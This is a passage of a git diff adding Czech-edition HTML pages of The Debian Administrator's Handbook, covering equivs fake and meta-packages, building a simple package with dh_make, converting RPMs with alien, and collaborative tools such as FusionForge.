+			The present version is already the eighth edition of the book (we include the first four that were only available in French). This edition covers version 9 of Debian, code-named <span
+            class="distribution distribution">Stretch</span>. Among the changes, Debian now sports a new architecture — <span
+            class="emphasis"><em>mips64el</em></span> for little-endian 64-bit MIPS processors. On the opposite side, the <span
+            class="emphasis"><em>powerpc</em></span> architecture has been dropped due to lack of volunteers to keep up with development (which itself can be explained by the fact that associated hardware is getting old and less interesting to work on). All included packages have obviously been updated, including the GNOME desktop, which is now in its version 3.22. Most executables have been rebuilt with PIE build flags thus enabling supplementary hardening measures (Address Space Layout Randomization, ASLR).
+		</div><div
+          class="para">
+			Přidali jsme nějaké poznámky a boční komentáře. Mají různé role: mohou upozornit na obtížný bod, dokončit myšlenku případové studie, definovat některé termíny, nebo sloužit jako připomenutí. Zde je seznam nejběžnějších bočních poznámek:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					ZPĚT k ZÁKLADŮM: připomínka některých informací, které mají být známy;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					SLOVNÍ ZÁSOBA: definuje technický termín, někdy specifický pro Debian;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					KOMUNITA: poukazuje na důležité osoby nebo role v rámci projektu;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					ZÁSADY: pravidlo nebo doporučení ze zásad Debianu. Tento dokument je nezbytný v rámci projektu a popisuje, jak balíčkovat software. Části zásad zvýrazněné v této příručce přináší uživatelům přímé výhody (například s vědomím, že zásady standardizují umístění dokumentace a příklady usnadňují najít je i v novém balíčku).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					Nástroj: představuje příslušný nástroj nebo službu;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					V praxi: teorie nemusí vždy odpovídat praxi; tyto boční poznámky obsahují rady vyplývající z našich zkušeností. Mohou také poskytnout podrobné a konkrétní příklady;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					ostatní více či méně časté boční komentáře jsou do jisté míry zřejmé: KULTURA, TIP, UPOZORNĚNÍ, JDĚTE DÁL, BEZPEČNOST, a tak dále.
+				</div></li></ul></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selected-approach.html"><strong>Předcházející</strong>3. Obecný přístup</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.acknowledgments.html"><strong>Další</strong>5. Poděkování</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.building-first-package.html b/tmp/cs-CZ/html/sect.building-first-package.html
new file mode 100644
index 000000000..900d31308
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.building-first-package.html
@@ -0,0 +1,386 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">15.2. Building your First Package</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="prev"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="next"
+        href="sect.setup-apt-package-repository.html"
+        title="15.3. Creating a Package Repository for APT" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.building-first-package.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="debian-packaging.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.setup-apt-package-repository.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.building-first-package"></a>15.2. Building your First Package</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.5.2"></a>15.2.1. Meta-Packages or Fake Packages</h3></div></div></div><div
+            class="para">
+				Fake packages and meta-packages are similar, in that they are empty shells that only exist for the effects their meta-data have on the package handling stack.
+			</div><div
+            class="para">
+				The purpose of a fake package is to trick <code
+              class="command">dpkg</code> and <code
+              class="command">apt</code> into believing that some package is installed even though it's only an empty shell. This allows satisfying dependencies on a package when the corresponding software was installed outside the scope of the packaging system. Such a method works, but it should still be avoided whenever possible, since there is no guarantee that the manually installed software behaves exactly like the corresponding package would and other packages depending on it would not work properly.
+			</div><div
+            class="para">
+				On the other hand, a meta-package exists mostly as a collection of dependencies, so that installing the meta-package will actually bring in a set of other packages in a single step.
+			</div><div
+            class="para">
+				Both these kinds of packages can be created by the <code
+              class="command">equivs-control</code> and <code
+              class="command">equivs-build</code> commands (in the <span
+              class="pkg pkg">equivs</span> package). The <code
+              class="command">equivs-control <em
+                class="replaceable">file</em></code> command creates a Debian package header file that should be edited to contain the name of the expected package, its version number, the name of the maintainer, its dependencies, and its description. Other fields without a default value are optional and can be deleted. The <code
+              class="literal">Copyright</code>, <code
+              class="literal">Changelog</code>, <code
+              class="literal">Readme</code> and <code
+              class="literal">Extra-Files</code> fields are not standard fields in Debian packages; they only make sense within the scope of <code
+              class="command">equivs-build</code>, and they will not be kept in the headers of the generated package.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.2.6"></a><p
+              class="title"><strong>Příklad 15.2. Header file of the <span
+                  class="emphasis"><em>libxml-libxml-perl</em></span> fake package</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Section: perl
+Priority: optional
+Standards-Version: 3.9.6
+
+Package: libxml-libxml-perl
+Version: 2.0116-1
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Depends: libxml2 (&gt;= 2.7.4)
+Architecture: all
+Description: Fake package - module manually installed in site_perl
+ This is a fake package to let the packaging system
+ believe that this Debian package is installed. 
+ .
+ In fact, the package is not installed since a newer version
+ of the module has been manually compiled &amp; installed in the
+ site_perl directory.
+</pre></div></div><div
+            class="para">
+				The next step is to generate the Debian package with the <code
+              class="command">equivs-build <em
+                class="replaceable">file</em></code> command. Voilà: the package is created in the current directory and it can be handled like any other Debian package would.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.5.3"></a>15.2.2. Simple File Archive</h3></div></div></div><div
+            class="para">
+				The Falcot Corp administrators need to create a Debian package in order to ease deployment of a set of documents on a large number of machines. The administrator in charge of this task first reads the “New Maintainer's Guide”, then starts working on their first package. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/doc/manuals/maint-guide/">https://www.debian.org/doc/manuals/maint-guide/</a></div>
+			</div><div
+            class="para">
+				The first step is creating a <code
+              class="filename">falcot-data-1.0</code> directory to contain the target source package. The package will logically, be named <code
+              class="literal">falcot-data</code> and bear the <code
+              class="literal">1.0</code> version number. The administrator then places the document files in a <code
+              class="filename">data</code> subdirectory. Then they invoke the <code
+              class="command">dh_make</code> command (from the <span
+              class="pkg pkg">dh-make</span> package) to add files required by the package generation process, which will all be stored in a <code
+              class="filename">debian</code> subdirectory:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cd falcot-data-1.0</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>dh_make --native</code></strong>
+<code
+              class="computeroutput">
+Type of package: single binary, indep binary, multiple binary, library, kernel module, kernel patch?
+ [s/i/m/l/k/n] </code><strong
+              class="userinput"><code>i</code></strong>
+<code
+              class="computeroutput">
+Maintainer name : Raphael Hertzog
+Email-Address   : hertzog@debian.org
+Date            : Fri, 04 Sep 2015 12:09:39 -0400
+Package Name    : falcot-data
+Version         : 1.0
+License         : gpl3
+Type of Package : Independent
+Hit &lt;enter&gt; to confirm:
+Currently there is no top level Makefile. This may require additional tuning.
+Done. Please edit the files in the debian/ subdirectory now. You should also
+check that the falcot-data Makefiles install into $DESTDIR and not in / .
+$</code></pre><div
+            class="para">
+				The selected type of package (<span
+              class="emphasis"><em>indep binary</em></span>) indicates that this source package will generate a single binary package that can be shared across all architectures (<code
+              class="literal">Architecture: all</code>). <span
+              class="emphasis"><em>single binary</em></span> acts as a counterpart, and leads to a single binary package that is dependent on the target architecture (<code
+              class="literal">Architecture: any</code>). In this case, the former choice is more relevant since the package only contains documents and no binary programs, so it can be used similarly on computers of all architectures.
+			</div><a
+            id="id-1.18.5.3.6"
+            class="indexterm"></a><a
+            id="id-1.18.5.3.7"
+            class="indexterm"></a><div
+            class="para">
+				The <span
+              class="emphasis"><em>multiple binary</em></span> type corresponds to a source package leading to several binary packages. A particular case, <span
+              class="emphasis"><em>library</em></span>, is useful for shared libraries, since they need to follow strict packaging rules. In a similar fashion, <span
+              class="emphasis"><em>kernel module</em></span> or <span
+              class="emphasis"><em>kernel patch</em></span> should be restricted to packages containing kernel modules.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Maintainer's name and email address</strong></p></div></div></div><div
+              class="para">
+				Most of the programs involved in package maintenance will look for your name and email address in the <code
+                class="varname">DEBFULLNAME</code> and <code
+                class="varname">DEBEMAIL</code> or <code
+                class="varname">EMAIL</code> environment variables. Defining them once and for all will avoid you having to type them multiple times. If your usual shell is <code
+                class="command">bash</code>, it is a simple matter of adding the following two lines in your <code
+                class="filename">~/.bashrc</code> file (you will obviously replace the values with more relevant ones!):
+			</div><pre
+              class="programlisting">
+export EMAIL="hertzog@debian.org"
+export DEBFULLNAME="Raphael Hertzog"
+</pre></div><div
+            class="para">
+				The <code
+              class="command">dh_make</code> command created a <code
+              class="filename">debian</code> subdirectory with many files. Some are required, in particular <code
+              class="filename">rules</code>, <code
+              class="filename">control</code>, <code
+              class="filename">changelog</code> and <code
+              class="filename">copyright</code>. Files with the <code
+              class="filename">.ex</code> extension are example files that can be used by modifying them (and removing the extension) when appropriate. When they are not needed, removing them is recommended. The <code
+              class="filename">compat</code> file should be kept, since it is required for the correct functioning of the <span
+              class="emphasis"><em>debhelper</em></span> suite of programs (all beginning with the <code
+              class="command">dh_</code> prefix) used at various stages of the package build process.
+			</div><div
+            class="para">
+				The <code
+              class="filename">copyright</code> file must contain information about the authors of the documents included in the package, and the related license. In our case, these are internal documents and their use is restricted to within the Falcot Corp company. The default <code
+              class="filename">changelog</code> file is generally appropriate; replacing the “Initial release” with a more verbose explanation and changing the distribution from <code
+              class="literal">unstable</code> to <code
+              class="literal">internal</code> is enough. The <code
+              class="filename">control</code> file was also updated: the <code
+              class="literal">Section</code> field has been changed to <span
+              class="emphasis"><em>misc</em></span> and the <code
+              class="literal">Homepage</code>, <code
+              class="literal">Vcs-Git</code> and <code
+              class="literal">Vcs-Browser</code> fields were removed. The <code
+              class="literal">Depends</code> fields was completed with <code
+              class="literal">iceweasel | www-browser</code> so as to ensure the availability of a web browser able to display the documents in the package.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.12"></a><p
+              class="title"><strong>Příklad 15.3. The <code
+                  class="filename">control</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Source: falcot-data
+Section: misc
+Priority: optional
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Build-Depends: debhelper (&gt;= 9)
+Standards-Version: 3.9.5
+
+Package: falcot-data
+Architecture: all
+Depends: iceweasel | www-browser, ${misc:Depends}
+Description: Internal Falcot Corp Documentation
+ This package provides several documents describing the internal
+ structure at Falcot Corp.  This includes:
+  - organization diagram
+  - contacts for each department.
+ .
+ These documents MUST NOT leave the company.
+ Their use is INTERNAL ONLY.
+</pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.13"></a><p
+              class="title"><strong>Příklad 15.4. The <code
+                  class="filename">changelog</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+falcot-data (1.0) internal; urgency=low
+
+  * Initial Release.
+  * Let's start with few documents:
+    - internal company structure;
+    - contacts for each department.
+
+ -- Raphael Hertzog &lt;hertzog@debian.org&gt;  Fri, 04 Sep 2015 12:09:39 -0400
+</pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.14"></a><p
+              class="title"><strong>Příklad 15.5. The <code
+                  class="filename">copyright</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Upstream-Name: falcot-data
+
+Files: *
+Copyright: 2004-2015 Falcot Corp
+License: 
+ All rights reserved.
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> <code
+                        class="filename">Makefile</code> file</strong></p></div></div></div><a
+              id="id-1.18.5.3.15.2"
+              class="indexterm"></a><div
+              class="para">
+				A <code
+                class="filename">Makefile</code> file is a script used by the <code
+                class="command">make</code> program; it describes rules for how to build a set of files from each other in a tree of dependencies (for instance, a program can be built from a set of source files). The <code
+                class="filename">Makefile</code> file describes these rules in the following format:
+			</div><pre
+              class="programlisting">
+target: source1 source2 ...
+        command1
+        command2
+</pre><div
+              class="para">
+				The interpretation of such a rule is as follows: if one of the <code
+                class="literal">source*</code> files is more recent than the <code
+                class="literal">target</code> file, then the target needs to be generated, using <code
+                class="command">command1</code> and <code
+                class="command">command2</code>.
+			</div><div
+              class="para">
+				Note that the command lines must start with a tab character; also note that when a command line starts with a dash character (<code
+                class="literal">-</code>), failure of the command does not interrupt the whole process.
+			</div></div><div
+            class="para">
+				The <code
+              class="filename">rules</code> file usually contains a set of rules used to configure, build and install the software in a dedicated subdirectory (named after the generated binary package). The contents of this subdirectory is then archived within the Debian package as if it were the root of the filesystem. In our case, files will be installed in the <code
+              class="filename">debian/falcot-data/usr/share/falcot-data/</code> subdirectory, so that installing the generated package will deploy the files under <code
+              class="filename">/usr/share/falcot-data/</code>. The <code
+              class="filename">rules</code> file is used as a <code
+              class="filename">Makefile</code>, with a few standard targets (including <code
+              class="literal">clean</code> and <code
+              class="literal">binary</code>, used respectively to clean the source directory and generate the binary package).
+			</div><div
+            class="para">
+				Although this file is the heart of the process, it increasingly contains only the bare minimum for running a standard set of commands provided by the <code
+              class="command">debhelper</code> tool. Such is the case for files generated by <code
+              class="command">dh_make</code>. To install our files, we simply configure the behavior of the <code
+              class="command">dh_install</code> command by creating the following <code
+              class="filename">debian/falcot-data.install</code> file:
+			</div><pre
+            class="programlisting">
+data/* usr/share/falcot-data/
+</pre><div
+            class="para">
+				At this point, the package can be created. We will however add a lick of paint. Since the administrators want the documents to be easily accessed from the menus of graphical desktop environments, we add a <code
+              class="filename">falcot-data.desktop</code> file and get it installed in <code
+              class="filename">/usr/share/applications</code> by adding a second line to <code
+              class="filename">debian/falcot-data.install</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.20"></a><p
+              class="title"><strong>Příklad 15.6. The <code
+                  class="filename">falcot-data.desktop</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+[Desktop Entry]
+Name=Internal Falcot Corp Documentation
+Comment=Starts a browser to read the documentation
+Exec=x-www-browser /usr/share/falcot-data/index.html
+Terminal=false
+Type=Application
+Categories=Documentation;
+</pre></div></div><div
+            class="para">
+				The updated <code
+              class="filename">debian/falcot-data.install</code> looks like this:
+			</div><pre
+            class="programlisting">
+data/* usr/share/falcot-data/
+falcot-data.desktop usr/share/applications/
+</pre><div
+            class="para">
+				Our source package is now ready. All that's left to do is to generate the binary package, with the same method we used previously for rebuilding packages: we run the <code
+              class="command">dpkg-buildpackage -us -uc</code> command from within the <code
+              class="filename">falcot-data-1.0</code> directory.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="debian-packaging.html"><strong>Předcházející</strong>Kapitola 15. Creating a Debian Package</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.setup-apt-package-repository.html"><strong>Další</strong>15.3. Creating a Package Repository for APT</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.coexistence-with-other-packaging-systems.html b/tmp/cs-CZ/html/sect.coexistence-with-other-packaging-systems.html
new file mode 100644
index 000000000..cd944ba7d
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.coexistence-with-other-packaging-systems.html
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.5. Coexistence with Other Packaging Systems</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="sect.manipulating-packages-with-dpkg.html"
+        title="5.4. Manipulating Packages with dpkg" /><link
+        rel="next"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.coexistence-with-other-packaging-systems.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="apt.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.coexistence-with-other-packaging-systems"></a>5.5. Coexistence with Other Packaging Systems</h2></div></div></div><a
+          id="id-1.8.9.2"
+          class="indexterm"></a><a
+          id="id-1.8.9.3"
+          class="indexterm"></a><a
+          id="id-1.8.9.4"
+          class="indexterm"></a><div
+          class="para">
+			Debian packages are not the only software packages used in the free software world. The main competitor is the RPM format of the Red Hat Linux distribution and its many derivatives. Red Hat is a very popular, commercial distribution. It is thus common for software provided by third parties to be offered as RPM packages rather than Debian.
+		</div><div
+          class="para">
+			In this case, you should know that the program <code
+            class="command">rpm</code>, which handles RPM packages, is available as a Debian package, so it is possible to use this package format on Debian. Care should be taken, however, to limit these manipulations to extract the information from a package or to verify its integrity. It is, in truth, unreasonable to use <code
+            class="command">rpm</code> to install an RPM on a Debian system; RPM uses its own database, separate from those of native software (such as <code
+            class="command">dpkg</code>). This is why it is not possible to ensure a stable coexistence of two packaging systems.
+		</div><div
+          class="para">
+			On the other hand, the <span
+            class="pkg pkg">alien</span> utility can convert RPM packages into Debian packages, and vice versa.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> Encouraging the adoption of <code
+                      class="filename">.deb</code></strong></p></div></div></div><div
+            class="para">
+			If you regularly use the <code
+              class="command">alien</code> program to install RPM packages coming from one of your providers, do not hesitate to write to them and amicably express your strong preference for the <code
+              class="filename">.deb</code> format. Note that the format of the package is not everything: a <code
+              class="filename">.deb</code> package built with <code
+              class="command">alien</code> or prepared for a version of Debian different than that which you use, or even for a derivative distribution like Ubuntu, would probably not offer the same level of quality and integration as a package specifically developed for Debian <span
+              class="distribution distribution">Stretch</span>.
+		</div></div><pre
+          class="screen">
+<code
+            class="computeroutput">$ </code><strong
+            class="userinput"><code>fakeroot alien --to-deb phpMyAdmin-4.7.5-2.fc28.noarch.rpm</code></strong>
+<code
+            class="computeroutput">phpmyadmin_4.7.5-3_all.deb generated
+$ </code><strong
+            class="userinput"><code>ls -s phpmyadmin_4.7.5-3_all.deb</code></strong>
+<code
+            class="computeroutput">  4356 phpmyadmin_4.7.5-3_all.deb</code></pre><div
+          class="para">
+			You will find that this process is extremely simple. You must know, however, that the package generated does not have any dependency information, since the dependencies in the two packaging formats don't have systematic correspondence. The administrator must thus manually ensure that the converted package will function correctly, and this is why Debian packages thus generated should be avoided as much as possible. Fortunately, Debian has the largest collection of software packages of all distributions, and it is likely that whatever you seek is already in there.
+		</div><div
+          class="para">
+			Looking at the man page for the <code
+            class="command">alien</code> command, you will also note that this program handles other packaging formats, especially the one used by the Slackware distribution (it is made of a simple <code
+            class="filename">tar.gz</code> archive).
+		</div><div
+          class="para">
+			The stability of the software deployed using the <code
+            class="command">dpkg</code> tool contributes to Debian's fame. The APT suite of tools, described in the following chapter, preserves this advantage, while relieving the administrator from managing the status of packages, a necessary but difficult task.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Předcházející</strong>5.4. Manipulating Packages with dpkg</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="apt.html"><strong>Další</strong>Kapitola 6. Maintenance and Updates: The APT Tools</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.collaborative-work.html b/tmp/cs-CZ/html/sect.collaborative-work.html
new file mode 100644
index 000000000..8eea17e2e
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.collaborative-work.html
@@ -0,0 +1,153 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.7. Collaborative Work</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.development.html"
+        title="13.6. Development" /><link
+        rel="next"
+        href="sect.office-suites.html"
+        title="13.8. Office Suites" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.collaborative-work.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.development.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.office-suites.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.collaborative-work"></a>13.7. Collaborative Work</h2></div></div></div><a
+          id="id-1.16.10.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.10.3"></a>13.7.1. Working in Groups: <span
+                    class="foreignphrase"><em
+                      class="foreignphrase">groupware</em></span></h3></div></div></div><a
+            id="id-1.16.10.3.2"
+            class="indexterm"></a><div
+            class="para">
+				Groupware tools tend to be relatively complex to maintain because they aggregate multiple tools and have requirements that are not always easy to reconcile in the context of an integrated distribution. Thus there is a long list of groupware packages that were once available in Debian but have been dropped for lack of maintainers or incompatibility with other (newer) software in Debian. This has been the case with PHPGroupware, eGroupware, and Kolab. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.egroupware.org/">http://www.egroupware.org/</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.kolab.org/">https://www.kolab.org/</a></div>
+			</div><a
+            id="id-1.16.10.3.4"
+            class="indexterm"></a><a
+            id="id-1.16.10.3.5"
+            class="indexterm"></a><div
+            class="para">
+				All is not lost though. Many of the features traditionally provided by “groupware” software are increasingly integrated into “standard” software. This is reducing the requirement for specific, specialized groupware software. On the other hand, this usually requires a specific server. Citadel (in the <span
+              class="pkg pkg">citadel-suite</span> package) and Sogo (in the <span
+              class="pkg pkg">sogo</span> package) are alternatives that are available in Debian <span
+              class="distribution distribution">Stretch</span>.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.10.4"></a>13.7.2. Collaborative Work With FusionForge</h3></div></div></div><a
+            id="id-1.16.10.4.2"
+            class="indexterm"></a><div
+            class="para">
+				FusionForge is a collaborative development tool with some ancestry in SourceForge, a hosting service for free software projects. It takes the same overall approach based on the standard development model for free software. The software itself has kept evolving after the SourceForge code went proprietary. Its initial authors, VA Software, decided not to release any more free versions. The same happened again when the first fork (GForge) followed the same path. Since various people and organizations have participated in development, the current FusionForge also includes features targeting a more traditional approach to development, as well as projects not purely concerned with software development.
+			</div><a
+            id="id-1.16.10.4.4"
+            class="indexterm"></a><div
+            class="para">
+				FusionForge can be seen as an amalgamation of several tools dedicated to manage, track and coordinate projects. These tools can be roughly classified into three families:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<span
+                    class="emphasis"><em>communication</em></span>: web forums, mailing-list manager, and announcement system allowing a project to publish news
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<span
+                    class="emphasis"><em>tracking</em></span>: tools to track project progress and schedule tasks, to track bugs, feature requests, or any other kind of “ticket”, and to run surveys
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<span
+                    class="emphasis"><em>sharing</em></span>: documentation manager to provide a single central point for documents related to a project, generic file release manager, dedicated website for each project.
+					</div></li></ul></div><div
+            class="para">
+				Since FusionForge largely targets development projects, it also integrates many tools such as CVS, Subversion, Git, Bazaar, Darcs, Mercurial and Arch for source control management (also called “configuration management” or “version control”). These programs keep a history of all the revisions of all tracked files (often source code files), with all the changes they go through, and they can merge modifications when several developers work simultaneously on the same part of a project.
+			</div><div
+            class="para">
+				Most of these tools can be accessed or even managed through a web interface, with a fine-grained permission system, and email notifications for some events.
+			</div><div
+            class="para">
+				Unfortunately, FusionForge is not part of Debian <span
